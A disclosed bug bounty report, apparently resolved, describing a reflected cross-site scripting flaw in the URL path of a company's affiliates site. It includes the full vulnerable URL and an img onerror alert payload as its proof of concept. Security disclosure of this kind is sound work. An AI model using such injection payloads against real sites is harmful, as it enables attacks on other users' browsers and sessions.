XSS in https://affiliates.kromtech.com
Medium
C
Clario
Submitted None
Team Summary
Official summary from Clario
### Summary XSS in https://affiliates.kromtech.com Vulnerable URL: https://affiliates.kromtech.com/monetize-mac-traffic/adgroup/affiliatefixhello%22%3E<img src%3da onerror%3dalert(document.domain)>hello/type/affiliate Vulnerable Parameter: "URL Path" XSS Payload: hello"><img src%3da onerror%3dalert(document.domain)>hello ### Steps To Reproduce: Navigate to the Vulnerable URL Notice the pop-up Supporting Material/References: Attached ScreenShot
Actions:
Reported by
kphaks
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$300.00
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected